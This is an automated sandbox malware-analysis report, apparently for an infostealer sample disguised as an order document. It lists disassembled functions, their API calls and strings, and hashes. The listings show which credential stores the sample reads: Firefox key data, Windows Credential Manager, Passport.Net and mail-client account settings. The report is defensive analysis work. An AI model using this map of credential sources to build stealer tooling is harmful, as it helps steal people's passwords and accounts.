                                        • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                        • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                        Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                          • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmpmemcpy
                                        • String ID: BINARY$NOCASE$RTRIM$main$temp
                                        • API String ID: 1784268899-4153596280
                                        • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                        • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                        • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                        • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                        Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                        • memset.MSVCRT ref: 00410246
                                        • memset.MSVCRT ref: 00410258
                                          • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                        • memset.MSVCRT ref: 0041033F
                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                        • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3974772901-0
                                        • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                        • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                        • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                        • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                        Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 0044406C
                                        • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                        • strlen.MSVCRT ref: 004440D1
                                          • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                          • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                        • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                        • String ID:
                                        • API String ID: 577244452-0
                                        • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                        • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                        • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                        • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                        Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        • _strcmpi.MSVCRT ref: 00404518
                                        • _strcmpi.MSVCRT ref: 00404536
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi$memcpystrlen
                                        • String ID: imap$pop3$smtp
                                        • API String ID: 2025310588-821077329
                                        • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                        • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                        • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                        • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                        Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040C02D
                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                          • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                          • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                          • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2726666094-3614832568
                                        • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                        • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                        • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                        • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                        Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00403A88
                                        • memset.MSVCRT ref: 00403AA1
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                        • strlen.MSVCRT ref: 00403AE9
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                        • String ID:
                                        • API String ID: 1786725549-0
                                        • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                        • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                        • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                        • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                        Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                        • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                        • OpenClipboard.USER32(?), ref: 0040C1B1
                                        • GetLastError.KERNEL32 ref: 0040C1CA
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                        • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                        • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                        • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                        Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                          • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                          • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                          • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                        • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                        • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                        • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID: global-salt$password-check
                                        • API String ID: 231171946-3927197501
                                        • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                        • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                        • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                        • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                        Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                        • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                        • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                        • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                        Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004016A3
                                        • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                        • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                        • BeginPaint.USER32(?,?), ref: 004016D7
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                        • EndPaint.USER32(?,?), ref: 004016F3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                        • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                        • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                        • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                        Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040644F
                                        • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                        • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                          • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID:
                                        • API String ID: 438689982-0
                                        • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                        • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                        • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                        • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                        Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0044495F
                                        • memset.MSVCRT ref: 00444978
                                        • memset.MSVCRT ref: 0044498C
                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                        • strlen.MSVCRT ref: 004449A8
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                        • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                        • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset$strlen
                                        • String ID:
                                        • API String ID: 2142929671-0
                                        • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                        • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                        • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                        • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                        Function 00408DB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                        • strlen.MSVCRT ref: 00408E4F
                                        • LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                        • memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D5C
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D7A
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D98
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408DA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                        • String ID: strings
                                        • API String ID: 4036804644-3030018805
                                        • Opcode ID: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                        • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                        • Opcode Fuzzy Hash: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                        • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                        Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                        • strlen.MSVCRT ref: 0040F7BE
                                        • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                        • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                        • String ID: Passport.Net\*
                                        • API String ID: 2329438634-3671122194
                                        • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                        • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                        • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                        • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                        Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                        • memset.MSVCRT ref: 0040330B
                                        • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                        • strchr.MSVCRT ref: 0040335A
                                          • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
